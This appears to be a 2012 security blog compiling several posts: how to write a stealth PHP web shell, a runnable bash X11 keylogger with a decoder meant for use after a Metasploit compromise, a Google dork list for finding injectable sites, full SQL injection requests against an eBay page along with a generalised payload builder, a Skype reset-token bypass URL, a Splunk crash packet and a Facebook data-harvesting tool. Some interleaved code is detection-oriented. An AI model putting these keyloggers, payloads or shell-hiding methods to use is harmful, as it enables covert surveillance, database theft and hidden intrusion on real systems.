Nov 24, 2012

PageScan - Web-based Malware Analysis


PageScan is a web content scraper for web-based malware analysis. It assists the analyst by detecting and listing any redirections, iframes, JavaScript, and links found inside a web page.

Source: https://github.com/d3t0n4t0r/pagescan


 
If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 22, 2012

Howto: Installing Mac OS X Mountain Lion in VMware, by SecurityLearn

Mountain Lion VM:
1) Download VMware Workstation 8 – Torrent Link
2) Enable hardware virtualization in the computer BIOS – if you don't know how to do this, read this link
3) Download the Mac OS X Mountain Lion VMware image – Torrent Link
4) VMware does not support virtualization of OS X out of the box. To unlock VMware, extract the Mountain Lion VMware image and go to the 'VMware Unlocker – Mac OS X Guest\VMware 8.x Series\VMware Workstation Unlocker – Windows' folder. Right-click 'Install.bat' and run it as administrator. It patches VMware and allows the installation of Mac OS X.
5) In the extracted VMware image, double-click the .vmx file and it will load the Mountain Lion VM.


Source:  http://www.securitylearn.net/2012/11/22/installing-mac-os-x-mountain-lion-in-vmware/


Nov 21, 2012

Writing a stealth web shell


No bad function calls
The shell should not contain any bad function calls such as eval, passthru, exec, system, the backtick operator or similar. This is to avoid detection by scanners such as antivirus or static analysis tools. We have a few options here, such as using a variable variable to dynamically assign the function to call, or we could go with the non-alpha PHP shell. I did, however, choose to go with a feature that relies on common methods, and AFAIK not many scanners pick up on variable function calls.

Hidden file
I already solved this with my htshells project. Having your shell in a dot file keeps it hidden on Linux (a plain ls does not list dot files). If you cannot upload a .htaccess file, however, I would aim to hide in plain sight with an index.php file instead.

Hidden payload
To keep the payload out of the URL we'll provide it outside of the request URI and request body. A cookie is a common place to store the payload, but I decided to use a non-cookie header, just to be safe in case someone decides to log cookies.

Hidden url
Luckily the .htaccess file also offers us an option to hide the URL of our web shell using mod_rewrite. This allows us to invoke the shell through a different URL.

WAF/IDS bypass
By applying common encoding we can ensure that plaintext rules don't match our payload, and make parsing the request expensive enough that real-time decoding isn't feasible. For the extra paranoid, encoding in combination with basic obfuscation will also stop detection by an IDS that offloads decoding to an offline agent. I chose plain base64 encoding and padded it with some bytes to make automated parsing fail.

Limited forensic evidence
This is where most shells fail: most web shells use request parameters for command input, and those end up in the web server's access log. This is great on penetration tests as it offers transparency to the client, but it's not very stealthy. I'll start by illustrating a log segment for favicon requests.
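As an added example (mine, not code from the original post), the following Python shows the defender's side of two of the evasions described above: a static check over PHP source that flags variable function calls and request-header input, rather than only the usual list of dangerous function names, and a decoder that strips junk bytes out of a padded base64 header value before decoding it. The PHP snippets and the header value are constructed here for illustration; the indicator names are my own.

```python
import base64
import re

# Function names a naive scanner greps for; the post's point is that a shell
# can avoid every one of them by calling through a variable.
DANGEROUS_FUNCS = ("eval", "assert", "system", "exec", "passthru",
                   "shell_exec", "popen", "proc_open", "pcntl_exec")

DANGEROUS_RE = re.compile(r"\b(?:%s)\s*\(" % "|".join(DANGEROUS_FUNCS))
VAR_FUNC_RE = re.compile(r"\$[A-Za-z_]\w*\s*\(")                    # $f(...)
VAR_VAR_RE = re.compile(r"\$\$[A-Za-z_]\w*|\$\{\s*\$")              # $$name or ${$name}
BACKTICK_RE = re.compile(r"`[^`\n]*\$[^`\n]*`")                     # `$cmd` shell operator
HEADER_RE = re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_[A-Z0-9_]+['\"]\s*\]")  # header as input
B64_RE = re.compile(r"\bbase64_decode\s*\(")


def scan_php(src):
    """Return the indicators found in a PHP source string, in a fixed order."""
    checks = (
        ("dangerous-function", DANGEROUS_RE),
        ("variable-function-call", VAR_FUNC_RE),
        ("variable-variable", VAR_VAR_RE),
        ("backtick-exec", BACKTICK_RE),
        ("header-input", HEADER_RE),
        ("base64-decode", B64_RE),
    )
    return [name for name, rx in checks if rx.search(src)]


def is_stealth_shell_candidate(findings):
    """A dynamic call fed from a request header is the combination the post
    describes; a bare dangerous function name is what naive scanners catch."""
    dynamic = {"variable-function-call", "variable-variable", "backtick-exec"}
    return bool(dynamic & set(findings)) and "header-input" in findings


NOT_B64 = re.compile(r"[^A-Za-z0-9+/=]")


def decode_padded_b64(value):
    """Decode base64 that has had junk bytes mixed in to break naive decoders:
    drop anything outside the alphabet, then repair the '=' padding."""
    clean = NOT_B64.sub("", value).rstrip("=")
    clean += "=" * (-len(clean) % 4)
    return base64.b64decode(clean)


# Constructed samples, not code from the post.
SAMPLE_SHELL = r"""<?php
$h = $_SERVER['HTTP_X_REQUEST_ID'];
$f = "sys" . "tem";
$f(base64_decode(preg_replace('/[^A-Za-z0-9+\/=]/', '', $h)));
"""
SAMPLE_BENIGN = "<?php echo htmlspecialchars($_GET['q']);\n"
SAMPLE_HEADER = "dW5h!!bWUgLWE#="   # base64("uname -a") with junk bytes inserted

if __name__ == "__main__":
    for name, src in (("shell", SAMPLE_SHELL), ("benign", SAMPLE_BENIGN)):
        found = scan_php(src)
        flag = "stealth-shell-candidate" if is_stealth_shell_candidate(found) else ""
        print(name, found, flag)
    print(decode_padded_b64(SAMPLE_HEADER))
```

The constructed shell never contains the string "system(" and so passes a name-list scanner, which is exactly the weakness the post relies on; the variable call plus header input is the signal worth alerting on.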


Source: http://www.justanotherhacker.com/2011/12/writing-a-stealth-web-shell.html


Key Logger With Bash Script

For the shell session and the story behind this script, see the Source.
 
Key Logger Script. 
#!/bin/bash
# Attach to the logged-in user's X display and list input devices so the
# keyboard's xinput id can be chosen.
export DISPLAY=:0.0
xinput list
echo -e "KBD ID ?"
read kbd
# Save the keycode-to-keysym table first; the decoder needs it to turn keycodes into characters.
xmodmap -pke > /tmp/.xkey.log
# xinput fully buffers its output when stdout is not a terminal, so it is run
# under script(1) to get a pty. Sending script's own transcript to /dev/null
# avoids leaving a 'typescript' file in the working directory.
script -q -c "xinput test $kbd" /dev/null >> /tmp/.xkey.log &
echo "The keylog can be downloaded from /tmp/.xkey.log"
echo "Use the meterpreter download function"
echo "Press CTRL+C to exit this session, keylogger will run in background"
 
 
Decode script

#!/bin/sh
# Split the log into the xmodmap table (keycode -> keysym) and the key-press events.
grep keycode .xkey.log > xmodmap.pke
grep 'key p' .xkey.log > xlog
rm -f .xkey.log
# Generate the Python decoder (runs under Python 2 or 3).
cat > decoder.py <<'EOF'
import re
import sys


def key_map():
    """Return {keycode: first keysym} from the saved 'xmodmap -pke' output."""
    table = {}
    with open("xmodmap.pke") as f:
        for line in f:
            m = re.match(r'keycode +(\d+) = (.+)', line)
            if m and m.group(2).strip():
                table[m.group(1)] = m.group(2).split()[0]
    return table


if len(sys.argv) < 2:
    print("Usage: %s FILE" % sys.argv[0])
    sys.exit(1)

keys = key_map()
with open(sys.argv[1]) as f:
    for line in f:
        m = re.match(r'key press +(\d+)', line)
        if m:
            # Keycodes missing from the table are printed as the raw number.
            print(keys.get(m.group(1), m.group(1)))
EOF

echo 'Please see LOG-keylogger for the output......'
python decoder.py xlog > LOG
# Join the one-key-per-line output into a single line.
sed ':a;N;$!ba;s/\n/ /g' LOG > LOG-keylogger
rm -f LOG xmodmap.pke decoder.py xlog
cat LOG-keylogger
 


Source: http://astr0baby.wordpress.com/2012/11/20/hacking-ubuntu-12-04-lts-using-metasploit/


Nice tool for API Monitoring

API Monitor is free software that lets you monitor and control API calls made by applications and services. It's a powerful tool for seeing how applications and services work, or for tracking down problems in your own applications.

Sources: http://www.rohitab.com/apimonitor#Download
         http://www.sensepost.com/blog/7802.html



Nov 20, 2012

Example Of Google Dork List For SQL Injection

This is an excerpt; for the full list, see the Source.

URL parameter patterns:
tekst.php?idt= newscat.php?id= newsticker_info.php?idn= rubrika.php?idr= offer.php?idf= index.php?id=
buy.php?category= article.php?ID= play_old.php?id= newsitem.php?num= top10.php?cat= historialeer.php?num=
reagir.php?num= Stray-Questions-View.php?num= forum_bds.php?num= game.php?id= view_product.php?id= sw_comment.php?id=
news.php?id= avd_start.php?avd= event.php?id= sql.php?id= news_view.php?id= select_biblio.php?id=
humor.php?id= ogl_inet.php?ogl_id= fiche_spectacle.php?id= communique_detail.php?id= sem.php3?id= kategorie.php4?id=
faq2.php?id= show_an.php?id= preview.php?id= loadpsb.php?id= opinions.php?id= spr.php?id=
announce.php?id= participant.php?id= download.php?id= main.php?id= review.php?id= chappies.php?id=
read.php?id= prod_detail.php?id= article.php?id= person.php?id= productinfo.php?id= showimg.php?id=
view.php?id= website.php?id= hosting_info.php?id= gery.php?id= rub.php?idr= view_faq.php?id=
artikelinfo.php?id= detail.php?ID= index.php?= profile_view.php?id= category.php?id= publications.php?id=
fellows.php?id= downloads_info.php?id= prod_info.php?id= shop.php?do=part&id= collectionitem.php?id= band_info.php?id=
product.php?id= releases.php?id= ray.php?id= produit.php?id= pop.php?id= shopping.php?id=
productdetail.php?id= post.php?id= viewshowdetail.php?id= clubpage.php?id= memberInfo.php?id= section.php?id=
theme.php?id= page.php?id= shredder-categories.php?id= tradeCategory.php?id= product_ranges_view.php?ID= shop_category.php?id=
transcript.php?id= channel_id= item_id= newsid= trainers.php?id= news-full.php?id=
news_display.php?getid= index2.php?option= readnews.php?id= newsone.php?id= product-item.php?id= pages.php?id=
clanek.php4?id= viewapp.php?id= viewphoto.php?id= galeri_info.php?l= iniziativa.php?in= curriculum.php?id=
labels.php?id= story.php?id= look.php?ID= aboutbook.php?id= pageid= page.php?file=
show.php?id=

Parameter combined with an unhandled PHP warning in the page text:
"id=" & intext:"Warning: mysql_fetch_array()"
"id=" & intext:"Warning: getimagesize()"
"id=" & intext:"Warning: session_start()"
"id=" & intext:"Warning: mysql_num_rows()"
"id=" & intext:"Warning: mysql_query()"
"id=" & intext:"Warning: array_merge()"
"id=" & intext:"Warning: preg_match()"
"id=" & intext:"Warning: filesize()"
"id=" & intext:"Warning: mysql_fetch_assoc()"
"id=" & intext:"Warning: is_writable()"
"id=" & intext:"Warning: Unknown()"
"id=" & intext:"Warning: mysql_result()"
"id=" & intext:"Warning: pg_exec()"
"id=" & intext:"Warning: require()"

Source: http://zer0byte.com/zeropastebin/?d12c062f86fa9e24#cGNgkzCl1DdTjjGzkavkAxv3i/OFxAMrdykli9hmQdY= 



Exploitable SQLi on Ebay.com - Analysis By David Vieira-Kurz


The vulnerable page was located at http://sea.ebay.com/news.php and the vulnerable parameter was the “checkbox” array POST parameter. During the research I found that every time I put some SQL statements there it showed a typical SQL error message saying that the syntax is wrong. For example, when I supplied:
Enforcing an error message - @@secalert
...
POST /news.php?time=3&catid=31 HTTP/1.1
...
checkbox%5B%5D=(select @@secalert)
the web server responded: “Unknown system variable ‘secalert’”.

But every time I supplied correct syntax I saw no results. So the only chance I saw was to start a sub-query using a nested SELECT statement, which would then give me some results when the syntax of the main SELECT statement is incorrect. So here we go:
SQL Injection PoC 1 - @@version
POST /news.php?time=3&catid=31 HTTP/1.1
Referer: http://sea.ebay.com/news/abpost/update/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: sea.ebay.com
Cookie: PHPSESSID=r84jrpqcue89t35dgdmd9mggg3; Campaign_country=MY; Campaign=11111; Campaign_kw=23; phpbb3_pcofr_u=1; phpbb3_pcofr_k=; phpbb3_pcofr_sid=e0c86e2f56f810ef4ec3991e95ebe9f8
Content-Length: 243
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

checkbox%5B%5D=(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+%40%40VERSION)%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))
The web server then responded with the following message. I have marked the interesting part, showing the version of the DBMS in use.

To ensure that this was not just a lucky random result, I decided to make a second request asking for the current DBMS user.
SQL Injection PoC 2 - user()
POST /news.php?time=3&catid=31 HTTP/1.1
Referer: http://sea.ebay.com/news/abpost/update/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: sea.ebay.com
Cookie: PHPSESSID=r84jrpqcue89t35dgdmd9mggg3; Campaign_country=MY; Campaign=11111; Campaign_kw=23; phpbb3_pcofr_u=1; phpbb3_pcofr_k=; phpbb3_pcofr_sid=e0c86e2f56f810ef4ec3991e95ebe9f8
Content-Length: 243
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

checkbox%5B%5D=(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+USER())%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&
The web server then responded with the following message. I have marked the interesting part, showing the current DBMS user.
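As an added example (mine, not part of the write-up), the following Python generalises the two requests above: build_payload() produces the same double-query payload for any scalar expression, and extract_leak() pulls the value back out of a MySQL duplicate-key error using the markers the requests wrap around it (CHAR(68) = "D" in front, CHAR(65),CHAR(86),CHAR(73),CHAR(68) = "AVID" after). The checkbox[] values are copied from the two requests above so the builder can be checked against them; the error text it is tested against is constructed in MySQL's message format, not a capture from eBay. The technique works because count(*) with GROUP BY on a key containing floor(rand()*2) makes MySQL evaluate that key more than once per row; across the two rows from the UNION the key collides about half the time, and the resulting "Duplicate entry" error echoes the key, which is why a request can come back empty and has to be repeated (the "lucky random" remark above).

```python
import re
from urllib.parse import unquote_plus

# Markers around the leaked value so it can be found in the error text.
MARK_BEFORE = "CHAR(68)"                                # "D"
MARK_AFTER = "CHAR(65),CHAR(86),CHAR(73),CHAR(68)"      # "AVID"


def build_payload(expr):
    """Double-query (GROUP BY / rand()) MySQL payload from the write-up with the
    extracted expression as a parameter, e.g. 'SELECT @@VERSION' or 'SELECT USER()'."""
    return ("(select 1 and row(1,1)>(select count(*),concat(CONCAT(%s,(%s),%s),0x3a,"
            "floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"
            % (MARK_BEFORE, expr, MARK_AFTER))


# MySQL reports the colliding GROUP BY key verbatim: D<value>AVID:<0|1>.
LEAK_RE = re.compile(r"Duplicate entry 'D(.*?)AVID:[01]' for key '")


def extract_leak(response_text):
    """Return the value between the D ... AVID markers, or None when the
    request did not trigger the duplicate-key collision."""
    m = LEAK_RE.search(response_text)
    return m.group(1) if m else None


# The checkbox[] values from the two requests in the write-up (form-encoded).
PAGE_PAYLOADS = {
    "SELECT @@VERSION": "(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)"
                        "%2C(SELECT+%40%40VERSION)%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))"
                        "%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))",
    "SELECT USER()": "(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)"
                     "%2C(SELECT+USER())%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))"
                     "%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))",
}


def page_payloads_match():
    """True when both requests on the page decode to exactly what build_payload() emits."""
    return all(unquote_plus(enc) == build_payload(expr) for expr, enc in PAGE_PAYLOADS.items())


# Constructed in MySQL's error format; not a response captured from eBay.
SAMPLE_ERROR = "Duplicate entry 'D5.1.66-logAVID:1' for key 'group_key'"

if __name__ == "__main__":
    print(page_payloads_match())
    print(build_payload("SELECT DATABASE()"))
    print(extract_leak(SAMPLE_ERROR))
```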

Source: http://blog.majorsecurity.net/2012/11/18/exploitable-sqli-on-ebay-dot-com-analysis/


Nice Source For Ruby

These links are a knowledge base for learning Ruby.

http://www.rubyinside.com/ruby-cheat-sheet-734.html 
http://refcardz.dzone.com/refcardz/essential-ruby#refcard-download-social-buttons-display


Skype Account Service Session Token Bypass

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers without user interaction and without a privileged user account.
For demonstration or reproduce ...

Reset Account: (Mail Link) 
https://api.skype.com/tracking/emails/click?m=7131000014602077951&go=account.changepassword&x=intcmp%3DT_140-_-H-_-311012-_-account.changepassword%26token%3D621d8b0e773cc298a149a1b916118114%26application%3Daccount

which leads to the expired-token page, the token having already been used more than six hours earlier ...

https://login.skype.com/intl/de/account/password-reset-request?token=621d8b0e773cc298a149a1b916118114&mode=&token_expired=1

It is only required to set the flag to 0 (zero) in the GET/POST request to make the session valid again. Replace token_expired=1 with token_expired=0:

https://login.skype.com/intl/de/account/password-reset-request?token=621d8b0e773cc298a149a1b916118114&mode=&token_expired=(+)0

Video(PoC Demo):

Solution:
=========
2012-11-12:  Vendor Fix/Patch (Skype)
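As an added example (a model written for this page, not Skype's code), the following Python puts the flaw described above beside a hardened version. In the vulnerable handler, whether the reset token has expired is carried in the client-supplied token_expired parameter and believed; in the hardened handler, expiry and single use are decided from server-side state only and the parameter is ignored. The names (ResetTokenStore, vulnerable_reset, hardened_reset) and the six-hour lifetime are assumptions of the model; the clock is injected so the "used 6h+ later" case from the advisory can be replayed.

```python
import hmac
import secrets

TOKEN_TTL_SECONDS = 6 * 3600   # assumed lifetime; the advisory's link was reused 6h+ later


class ResetTokenStore:
    """In-memory store of password-reset tokens. `now` is a callable returning
    epoch seconds so expiry can be exercised without waiting."""

    def __init__(self, now):
        self.now = now
        self._records = []          # list of (token, record)

    def issue(self, account):
        token = secrets.token_hex(16)   # 32 hex digits, like the token in the advisory
        self._records.append((token, {"account": account, "issued": self.now(), "used": False}))
        return token

    def lookup(self, token):
        # Constant-time comparison against every stored token, so the lookup
        # does not leak how much of a guess matched through timing.
        found = None
        for stored, rec in self._records:
            if hmac.compare_digest(stored.encode(), token.encode()):
                found = rec
        return found


def vulnerable_reset(store, params):
    """Models the flaw: the expiry decision travels in the request as
    token_expired, so a client can flip 1 to 0 and revive a stale token."""
    rec = store.lookup(params.get("token", ""))
    if rec is None or params.get("token_expired", "0") == "1":
        return None
    return rec["account"]


def hardened_reset(store, params):
    """Expiry and single use come from the stored record only; any
    token_expired parameter the client sends is never read."""
    rec = store.lookup(params.get("token", ""))
    if rec is None or rec["used"] or store.now() - rec["issued"] > TOKEN_TTL_SECONDS:
        return None
    rec["used"] = True      # a reset link is good for exactly one reset
    return rec["account"]


def demo():
    """Replay the advisory's scenario: a token revisited seven hours after issue."""
    clock = [0.0]
    store = ResetTokenStore(now=lambda: clock[0])
    token = store.issue("alice")
    clock[0] += 7 * 3600
    return {
        "vulnerable_flag_1": vulnerable_reset(store, {"token": token, "token_expired": "1"}),
        "vulnerable_flag_0": vulnerable_reset(store, {"token": token, "token_expired": "0"}),
        "hardened_flag_0": hardened_reset(store, {"token": token, "token_expired": "0"}),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```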
 
Source: http://packetstormsecurity.org/files/118199 



Splunk 4.x Denial Of Service

Overview:

When a splunktcp-input (for use in Splunk-to-Splunk communication) is
configured, an attacker can send an initial packet with a malformed
'__s2s_capabilities' field. This leads to a crash of the splunkd daemon,
making the splunktcp-input unavailable. If the Splunk web interface is
running on the same host, it will be unavailable too, as it needs to
communicate with splunkd.

Description:

An example packet looks like this (__s2s_capabilities is just 'A' here). The dump is in Haskell string notation: \0 is a NUL byte and \SOH, \STX, \ENQ and \DC3 stand for the single bytes 0x01, 0x02, 0x05 and 0x13, so after the zero-padded header the body reads as a 4-byte length (46, shown as '.'), a 4-byte field count (1), then the length-prefixed, NUL-terminated key '__s2s_capabilities' and value 'A':
"--splunk-cooked-mode-v3--\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0.\0\0\0\SOH\0\0\0\DC3__s2s_capabilities\0\0\0
\0\STXA\0\0\0\0\0\0\0\0\ENQ_raw\0"

When this packet is sent multiple times, splunkd eventually crashes with a
crash log similar to this one:

[build 128297] 2012-08-30 13:34:01
 Access violation, cannot read at address [0x00006A62]  Exception address:
[0x6FC4500A]  Crashing thread: TcpInputProcessor
    ContextFlags:  [0x0001007F]
    Dr0:  [0x00000000]
    Dr1:  [0x00000000]
    Dr2:  [0x00000000]
    Dr3:  [0x00000000]
    Dr6:  [0x00000000]
    Dr7:  [0x00000000]
    SegGs:  [0x00000000]
    SegFs:  [0x0000003B]
    SegEs:  [0x00000023]
    SegDs:  [0x00000023]
    Edi:  [0x099F0020]
    Esi:  [0x00006A62]
    Ebx:  [0x08BD5680]
    Edx:  [0x00000001]
    Ecx:  [0x01734000]
    Eax:  [0x05CD6A63]
    Ebp:  [0x03B0F9C4]
    Eip:  [0x6FC4500A] memcpy + 90/880
    SegCs:  [0x0000001B]
    EFlags:  [0x00010212]
    Esp:  [0x03B0F9BC]
    SegSs:  [0x00000023]

 OS: Windows
 Arch: i386

 Backtrace:
    Frame  0 @[0x03B0F9C4]:  [0x6FC80475] memcpy_s + 72/123
    Frame  1 @[0x03B0F9E0]:  [0x67DA1201]
           std::char_traits<char>::_Copy_s + 21/29
    Frame  2 @[0x03B0F9F8]:  [0x67DA394D]
     std::basic_string<char,std::char_traits<char>,
           std::allocator<char>>::assign + 126/146
    Frame  3 @[0x03B0FA1C]:  [0x67DA5E45]
           std::basic_string<char,std::char_traits<char>,
           std::allocator<char> >::operator= + 13/16
    Frame  4 @[0x05CD287C]:  [0x00006A62] ?
    Frame  5 @[0x0064656B]: (Frame below stack)

 Crash dump written to: C:\Program Files\Splunk\var\log\splunk\C__Program
Files_Splunk_bin_splunkd_exe_crash-2012-08-30-13-34-01.dmp

XXXXXXXXXXX /6.1 Service Pack 1
Threads running: 36
argv: [Splunkd -p 8089]
terminating...

Further analysis showed that the crash is indeed triggered by an incorrect
source address in a fastcopy_I call. It is unclear, though, where this address
comes from and why the crash only happens after a certain number of packets.
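As an added example, not part of the advisory, the following Python turns the dump above from its Haskell string notation back into bytes, parses it as a cooked-mode v3 message, and rebuilds it, so the layout can be inspected field by field or used as the basis of a detection rule on the length or content of __s2s_capabilities. The 400-byte header (assumed to split into a 128-byte signature, a 256-byte server name and a 16-byte port, all NUL padded) is my reading of the 375 NULs that follow the signature in the dump, and the trailing "raw length, then length-prefixed _raw marker" layout is read off the bytes shown, not taken from a Splunk specification. No network code is included.

```python
import re
import struct

# Haskell `show` notation: ASCII control characters by name, \0 as decimal.
_CONTROL_NAMES = ("NUL SOH STX ETX EOT ENQ ACK BEL BS HT LF VT FF CR SO SI "
                  "DLE DC1 DC2 DC3 DC4 NAK SYN ETB CAN EM SUB ESC FS GS RS US").split()
_CONTROL_CODES = {name: code for code, name in enumerate(_CONTROL_NAMES)}
_CONTROL_CODES.update({"SP": 0x20, "DEL": 0x7F})
_SIMPLE = {"n": 0x0A, "r": 0x0D, "t": 0x09, "\\": 0x5C, '"': 0x22}
# Longer names first so \SOH is not read as \SO followed by a literal H.
_ESC_RE = re.compile(r"\\(%s|\d+|&|[\\\"nrt])"
                     % "|".join(sorted(_CONTROL_CODES, key=len, reverse=True)))


def haskell_unescape(text):
    """Turn the body of a Haskell-escaped string literal into bytes."""
    out = bytearray()
    pos = 0
    for m in _ESC_RE.finditer(text):
        out += text[pos:m.start()].encode("latin-1")
        tok = m.group(1)
        if tok in _CONTROL_CODES:
            out.append(_CONTROL_CODES[tok])
        elif tok.isdigit():
            out.append(int(tok))
        elif tok != "&":            # \& is Haskell's empty separator escape
            out.append(_SIMPLE[tok])
        pos = m.end()
    out += text[pos:].encode("latin-1")
    return bytes(out)


SIGNATURE = b"--splunk-cooked-mode-v3--"
HEADER_LEN = 400    # assumed: 128-byte signature + 256-byte server name + 16-byte port


def _take(buf, off, n):
    if off + n > len(buf):
        raise ValueError("truncated field at offset %d" % off)
    return buf[off:off + n], off + n


def _u32(buf, off):
    chunk, off = _take(buf, off, 4)
    return struct.unpack(">I", chunk)[0], off


def _nul_str(buf, off, n):
    """Length-prefixed string whose length n includes the NUL terminator."""
    chunk, off = _take(buf, off, n)
    if not chunk.endswith(b"\0"):
        raise ValueError("string at offset %d lacks NUL terminator" % (off - n))
    return chunk[:-1], off


def parse_s2s_v3(pkt):
    header, off = _take(pkt, 0, HEADER_LEN)
    if not header.startswith(SIGNATURE):
        raise ValueError("missing cooked-mode v3 signature")
    body_len, off = _u32(pkt, off)
    if body_len != len(pkt) - off:
        raise ValueError("body length %d but %d bytes follow" % (body_len, len(pkt) - off))
    count, off = _u32(pkt, off)
    fields = {}
    for _ in range(count):
        klen, off = _u32(pkt, off)
        key, off = _nul_str(pkt, off, klen)
        vlen, off = _u32(pkt, off)
        fields[key], off = _nul_str(pkt, off, vlen)
    raw_len, off = _u32(pkt, off)
    raw, off = _take(pkt, off, raw_len)
    tlen, off = _u32(pkt, off)
    trailer, off = _nul_str(pkt, off, tlen)
    if off != len(pkt):
        raise ValueError("%d trailing bytes" % (len(pkt) - off))
    return {"server": header[128:384].rstrip(b"\0"), "port": header[384:].rstrip(b"\0"),
            "fields": fields, "raw": raw, "trailer": trailer}


def build_s2s_v3(fields, raw=b"", server=b"", port=b""):
    header = SIGNATURE.ljust(128, b"\0") + server.ljust(256, b"\0") + port.ljust(16, b"\0")
    body = struct.pack(">I", len(fields))
    for key, val in fields.items():
        body += struct.pack(">I", len(key) + 1) + key + b"\0"
        body += struct.pack(">I", len(val) + 1) + val + b"\0"
    body += struct.pack(">I", len(raw)) + raw
    body += struct.pack(">I", 5) + b"_raw\0"
    return header + struct.pack(">I", len(body)) + body


# The advisory's packet in its own notation: signature, 375 NULs completing the
# header, then the 46-byte body (its length field is \0\0\0. since '.' is 46).
PAGE_PACKET_ESCAPED = ("--splunk-cooked-mode-v3--" + r"\0" * 375
                       + r"\0\0\0." + r"\0\0\0\SOH" + r"\0\0\0\DC3__s2s_capabilities\0"
                       + r"\0\0\0\STXA\0" + r"\0\0\0\0" + r"\0\0\0\ENQ_raw\0")

if __name__ == "__main__":
    packet = haskell_unescape(PAGE_PACKET_ESCAPED)
    msg = parse_s2s_v3(packet)
    print(len(packet), msg["fields"], msg["raw"], msg["trailer"])
    print(build_s2s_v3(msg["fields"]) == packet)
```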

Impact:

Denial of service of splunkd (and possibly the Splunk web-interface,
depending on configuration) until splunkd is restarted.

Fixes:

This issue has been fixed in Splunk 4.3.5 and 5.0.
 
Source: http://packetstormsecurity.org/files/118207 



Nov 18, 2012

Facebook Pwn

A cross-platform, Java-based Facebook social engineering framework. It sends friend requests to a list of Facebook profiles and polls for the acceptance notification. Once the victim accepts the invitation, it dumps all their information, photos and friend list to a local folder. It has extensible module interfaces and built-in modules for advanced social engineering tricks.

Source: http://code.google.com/p/fbpwn/

 
